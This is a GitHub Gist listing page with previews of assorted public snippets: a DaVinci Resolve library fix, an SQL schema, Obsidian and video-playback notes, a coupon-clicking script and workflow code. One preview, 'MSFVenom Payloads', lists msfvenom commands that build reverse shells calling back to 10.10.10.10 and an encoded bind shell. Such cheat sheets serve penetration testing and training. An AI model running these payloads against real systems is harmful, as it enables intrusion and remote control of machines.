Skip to content

Instantly share code, notes, and snippets.

@davidsmfreire
davidsmfreire / commands.txt
Created October 19, 2024 10:51
DaVinci Resolve 19 Linux fix | symbol lookup error: /usr/lib/libpango-1.0.so.0: undefined symbol: g_once_init_leave_pointer
cd /opt/resolve/libs
sudo mkdir disabled-libraries
sudo mv libglib* disabled-libraries
sudo mv libgio* disabled-libraries
sudo mv libgmodule* disabled-libraries
@isocroft
isocroft / low_budget_social_media_app_design_database.sql
Last active December 27, 2025 15:31
The database schema for a low-budget social media site (Reddit-like or BlueSky-like) using either MySQL, SQLite or PostgreSQL as primary database
-- MySQL v8.0.16
-- PostgresSQL v16.9.2
CREATE DATABASE IF NOT EXISTS `test`
DEFAULT CHARACTER SET utf8 -- utf8mb4
DEFAULT COLLATE utf8_general_ci; -- utf8mb4_unicode_ci
SET default_storage_engine = INNODB;
CREATE TABLE user_details (
@furbas16e8
furbas16e8 / Vault_Analytics.md
Last active December 27, 2025 15:30
Activity heatmaps and historical note review (Memories) for Obsidian vaults using the Datacore plugin.

By @furbas16e8

Vault Analytics for Obsidian

Advanced visualization system for Obsidian vaults, featuring activity heatmaps with statistical metrics and temporal memory review.

Version|74x20 Datacore

Features

@pitinga
pitinga / ML-Cupons.txt
Created December 26, 2025 13:40
Mercado Livre - Ativar Cupons
// Como Usar:
// Abra https://www.mercadolivre.com.br/cupons/filter?status=inactive
// Pressione F12 → Console
// Cole o script e pressione Enter
// O script vai:
// * Criar um iframe
// * Clicar em todos os botões "Aplicar"
// * Fazer refresh
// * Repetir até não haver mais botões
@motbob
motbob / playback_guide.md
Last active December 27, 2025 15:20

Guide to playing back video in high quality:

If you use mpv: no action needed.
If you use MPC-HC: install madVR and switch to it on the "Output" page in the MPC-HC settings.
If you use VLC: switch to a different player.

Guide to playing subtitles correctly:

If you use mpv: no action needed.
If you use MPC-HC: install version 2.1.3 or later. Go to Options > Subtitles > Default Style and check the "Use libass for SSA/ASS" box in the bottom right. Make sure that in Options > Playback > Output, your subtitle renderer is set to Internal Subtitle Renderer.

I hereby release all my anime-related work, including but not limited to work done on subtitles, video, and audio, whenever and wherever it was first published, into the public domain to the greatest extent of my power. This release includes, but is not limited to, anything published under the MTBB and Okay-Subs tags. So don't ask me for permission to use what I've released. It's not mine!

2025-10-28

@dejisec
dejisec / msf_pay.md
Created July 15, 2020 20:08
MSFVenom Payloads

PHP reverse shell

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php

Java WAR reverse shell

msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war

Linux bind shell

msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

Linux FreeBSD reverse shell

@STBoyden
STBoyden / effect-remote-functions.ts
Last active December 27, 2025 15:04
Effect.ts + SvelteKit remote functions
import type {
RemoteCommand,
RemoteForm,
RemoteFormInput,
RemoteQueryFunction
} from "@sveltejs/kit";
import { command, form, query } from "$app/server";
import { Effect, Schema } from "effect";
/**
@bluehatkeem
bluehatkeem / daily-digest.json
Created December 4, 2025 05:56
Convert Youtube Videos into Newsletter Summaries
{
"name": "Daily Digest",
"nodes": [
{
"parameters": {
"model": "openai/gpt-5.1",
"options": {}
},
"type": "@n8n/n8n-nodes-langchain.lmChatOpenRouter",
"typeVersion": 1,